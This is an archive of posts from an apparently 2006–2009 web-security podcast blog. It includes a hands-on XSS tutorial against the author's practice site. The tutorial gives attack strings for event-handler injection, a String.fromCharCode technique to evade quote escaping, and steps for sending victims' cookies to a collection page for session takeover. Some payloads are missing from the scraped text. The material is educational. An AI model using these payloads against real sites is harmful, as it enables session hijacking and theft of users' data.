MightySeek » Podcasts

An Information Security Place Podcast – Episode 28

Seek3r — Fri, 11 Dec 2009 07:26:57 +0000

This was a wacky episode and I only was able to turn up toward the end due to some scheduling conflicts, but I think it turned out pretty good in the end.

An Information Security Place Podcast – Episode 23

Seek3r — Thu, 20 Aug 2009 17:02:13 +0000

I returned as a guest host… looks like I may become a regular part of the cast. I promise I wont keep cross posting these forever, but doing it again since we talked about a blog post I had written yesterday.

Full show notes can be found at The Information Security Place site

MightySeek on InfoSecPlace Podcast

Seek3r — Tue, 18 Aug 2009 09:04:06 +0000

The MightySeek Podcast is returning.

I am starting an effort to have a show posted every 2 weeks, with hopes for a Hands On Series every 2 months.

I will also be joining the An Information Security Place podcast as well. They do a podcast about general information security and I will be the resident webappsec expert to comment on those topics. This post is going to link to that episode 22 of the An Information Security Place podcast. I will not be normally doing this, but am doing it this week to get things rolling.

SQL Injection mention on hype-free

Seek3r — Fri, 27 Apr 2007 07:35:42 +0000

Every once in awhile I try and find out if anyone is noticing my podcast. Well I stumbled on a mention of the SQL Injection hands on episode on hype-free.

MightySeek Interviews rsnake

Seek3r — Thu, 19 Apr 2007 07:45:27 +0000

Today I had the pleasure of meeting up with a celeb of the web app sec world…. rsnake of the ha.ckers.org website. I hope you enjoy the interview, but I made a huge mistake with the recording. Here I was with my first interview, I hook up my mic and load up the recording software and then completely forget to switch to the mic input to my good mic, and end up doing the recording on the lame mic thats built into my laptop.

In any case, here ya go.

PHP Security and the Month of PHP Bugs

Seek3r — Sat, 10 Mar 2007 01:20:01 +0000

In this episode is discuss PHP security. Up till this point I have talked about web app sec in general, but I break from this in honor of the Month Of PHP Bugs that is going on through March.

PHP has frequently been blamed for security problems in applications written in PHP which really is no fault of the language and engine itself. It would be like everyone blaming C and C++ as being insecure, and the cause of tons of security problems. Most of the time the problem is the developers who use the languages, not the languages themselves. However, there are security problems in the PHP codebase which need to be fixed and is what is being highlighted by the Month Of PHP Bugs.

So in this episode I discuss these issues, some of my past projects and some various other issues in PHP… Its so good to be back at the mic, even tho I am still recovering from the flu and had my voice start failing me at the end.
Enjoy!

Hands On Series – Cross Site Scripting (XSS) Part 1

Seek3r — Mon, 28 Aug 2006 03:57:40 +0000

The “Hands on Series” continues!

In this episode we start dealing with Cross Site Scripting (XSS) attacks.

CSS = Cascading Style Sheets
XSS = Cross Site Scripting

Cross Site Scripting is a technique used to add script to a trusted site that will be executed on other users browsers.
A key element to XSS is that one user can submit data to a website that will later be displayed for other users.
It is nessesary that the bad guy NOT mess up the HTML structure, otherwise the result will be web defacement rather then attacking other users.

The hackme site has been updated and improved (more about that in a moment)

and now includes a section for XSS which we will be using in this episode.

As usual, for the “Hands on Series” I recommend that you listen to these episodes while viewing the hacking test site and
have the show notes visible and ready to cut and paste from.

If we look at the source for the page we will see this:

Lets start by trying to somehow add an attribute so that when someone mouses over the name, the javascript will be executed.

Attack #1 – Against Email Address

Attack 1: Original

john@somedomain.com“>John Doe

Attack 1: Desired addition
onmouseover=”alert(’Hacked’);”

Attack 1: Desired Result
onmouseover=”alert(’Hacked’);”>Bob Smith

Attack 1: Attack String
bob@bob.com” onmouseover=”alert(’Hacked’);

Attack 1: Actual Result
bob@bob.com” onmouseover=”alert(’Hacked’);”>Bob Smith

Sucess! Mouse over the Name you entered and you see a popup that says “I hacked you”.
At this point we have proven that we can insert code onto the site and have it executed by a web browser!
This attack is only executed based on a user event (the user mousing over the link)

Lets try creating a script tag, which will get executed while the page is loaded by the browser (so basically right away).

Attack #2 – Against Email Address

Attack 2: Original
john@somedomain.com“>John Doe

Attack 2: Desired addition

Attack 2: Desired Result
<”>Bob Smith

Attack 2: Attack String
bob@bob.com”><”

Attack 2: Actual Result
bob@bob.com”><script>alert(’Hacked’);</script><”“>Bob Smith

Failure! No popup takes place.
Notice the Actual Result does not match the Desired Result.
This is because of htmlentities as mentioned in the helper notes.

Attack #3 – Against Title

Attack 3: Original
Works Great

Attack 3: Desired addition

Attack 3: Desired Result

Attack 3: Attack String
Works Great

Attack 3: Actual Result
Works Great

Failure! No popup takes place.
This almost worked, except that the single and double quotes get escaped, so lets try making something that doesnt need quotes.

Attack #4 – Against Title

In the alert function lets use the global variable document.domain in the attack string.

Attack 4: Attack String
Works Great

Attack 4: Actual Result
Works Great

Success! A popup should appear that says hackme.ntobjectives.com

Maybe this isnt convincing enough… lets try cookies.

Attack #5 – Against Title

Attack 5: Attack String
Works Great

Attack 5: Actual Result

Works Great

Success! A popup should appear that shows all your cookie data.
Theres nothing stopping the hacker from having the user send this data to their server.

I have setup a page for displaying inputs sent to it, but it makes sure to escape characters to make sure this isnt an attack point.

http://hackme.ntobjectives.com/xss/bin.php

Try it now

http://hackme.ntobjectives.com/xss/bin.php?abc=123
You should be shown that abc=123
This page will display anything you put in the GET params.

I want to push your cookie data over to my site, so that I can attempt a session take over.

Attack #6 – Against Title

Attack 6: Original
Works Great

Attack 6: Desired addition

We have already established that I cannot insert those single quotes that I need around the URL, so we need to enter into a little more advanced methods.
Using the javascript function String.fromCharCode allows me to get around needing quotes by turning each decimal value into its character, and it doesnt require any quotes.

So we just convert our desired string into decimal first

This:
http://hackme.ntobjectives.com/xss/bin.php?var=

becomes:

104,116,116,112,58,47,47,104,97,99,107,109,101,46,109,105,103,104,116,121,115,101,101,107,46, 99,111,109,47,120,115,115,47,98,105,110,46,112,104,112,63,118,97,114,61

and the attack string becomes

Attack 6: Attack String
Works Great

Attack 6: Actual Result
Works Great

Success! Your browser should be sitting on http://hackme.ntobjectives.com/xss/bin.php and showing you all the data from your cookies.
If this were an attackers site, it would just collect the info and pass you back to the page you came from, and its unlikely you would have ever noticed that your session information had been stolen

Mighty Seek Podcast #15 – News and Misc Topics

Seek3r — Fri, 26 May 2006 22:41:15 +0000

A quick in between to the Hands On Series, I chat about some news and issues of the day.

Turkish Hacker defaces 38,000 websites hosted on GoDaddy

Flawed USC admissions site allowed access to applicant data

Breach case could curtail Web flaw finders

Man charged with accessing USC student data

Tsunami appeal site ‘hacker’ found guilty

The Security Roundtable » Featured in the iTunes Music Store

Seek3r — Wed, 24 May 2006 23:40:05 +0000

The Security Roundtable » Blog Archive » SRT in the iTunes Music Store

The podcasting group Im a part of now has its own Artist Group in iTunes and is featured on the podcasting home page. Im pretty excited about this and look forward to any new listeners that join in due to the exposure.

Questions for podcast with Dan (PodPress developer)

Seek3r — Thu, 18 May 2006 22:31:14 +0000

James Woodcock will be interviewing me in the coming days, and so posted this on the forums.

Click here to get to the forum topic

Dan (Mighty Seek) developer of the PodPress plugin for Wordpress, will be interviewed in one of my future blogcasts on my website.

If you have any questions you would like him to answer about either his PodPress plugin or security, please ring my automated (non-premium) voicemail on UK: 0207 193 3092 or Worldwide: +44 207 193 3092 or for free on skype id: glidem

The best questions will be included in the show…..
__________________
>> Hear more about PodPress, in my audio interview with Dan Kuykendall <<

http://www.jameswoodcock.co.uk – My personal online diary covering the internet that I find of interest including audio interviews, music, gaming, technology, gadgets, websites, free downloads and general articles.